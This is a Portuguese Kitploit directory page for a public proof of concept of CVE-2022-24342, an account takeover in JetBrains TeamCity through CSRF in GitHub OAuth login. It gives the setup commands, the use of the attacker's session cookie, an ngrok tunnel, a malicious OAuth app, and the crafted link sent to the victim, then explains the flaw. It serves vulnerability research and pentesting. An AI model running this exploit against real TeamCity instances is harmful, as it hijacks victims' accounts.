Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2022-24342 — PoC para CVE-2022-24342: account takeover via CSRF na autenticação do GitHub | Kitploit
Ferramentas/GitHubGitHub/yuriisanin/cve-2022-24342
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAutenticaçãoRed Teaming
GitHubyuriisanin/cve-2022-24342

CVE-2022-24342

PoC para CVE-2022-24342: account takeover via CSRF na autenticação do GitHub

Ver Repositório
3772há 4 anosRevisado pelo Kitploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2022-24342

JetBrains TeamCity - tomada de conta via CSRF na autenticação do GitHub (PoC)

  • CVE-2022-24342
    • Pré-requisitos
    • Uso
    • Como funciona?
      • GitHub OAuth2: ordem de processamento dos parâmetros de consulta
      • CVE-2022-24342: fluxo de requisições HTTP

Pré-requisitos

  • JetBrains TeamCity <2021.2.1
  • Autenticação do GitHub habilitada

Uso

  1. Tente fazer login com a conta GitHub do atacante na instância alvo do TeamCity para autorizar o aplicativo GitHub do TeamCity.

  2. Instale e execute:

root@kitploit:~
$ git clone https://github.com/yuriisanin/CVE-2022-24342
$ cd CVE-2022-24342/
$ pip3 install -r requirements.txt
$ python3 exploit.py -h

usage: exploit.py [-h] -s S [-p P]

optional arguments:
  -h, --help  mostra esta mensagem de ajuda e sai
  -s S        sessão do usuário do GitHub
  -p P        porta do Uvicorn

$ python3 exploit.py -s {attackers_github_session_cookie}

Se você executar o exploit na máquina local, talvez precise usar Ngrok ou alternativas.

root@kitploit:~
$ ngrok http 8000
  1. Crie um aplicativo OAuth2 do GitHub:
root@kitploit:~
homepage: "http://{exploit-host}:8000"
authorization callback url: "http://{exploit-host}:8000/callback"
  1. Envie o seguinte link para a vítima:
root@kitploit:~
http://{exploit-host}:8000/exploit?target_host=http://{target-host}&gh_client_id={github_oauth_client_id}

DEMO:

CVE-2022-24342 Demo

Como funciona?

O TeamCity era vulnerável a injeção de parâmetros de consulta durante o fluxo OAuth2, permitindo que um atacante redirecionasse o usuário para um aplicativo OAuth2 arbitrário do GitHub, interceptasse um parâmetro de estado válido e conectasse uma conta GitHub arbitrária à conta TeamCity da vítima.

Isso foi possível devido aos seguintes fatores:

  • Ordem de processamento dos parâmetros de consulta do GitHub OAuth2
  • Injeção de parâmetros de consulta do TeamCity

GitHub OAuth2: ordem de processamento dos parâmetros de consulta

github-oauth-parameters-processing

CVE-2022-24342: fluxo de requisições HTTP

requests-flow

Suporte

Você pode me seguir no Twitter, GitHub ou YouTube.

Baixar ferramenta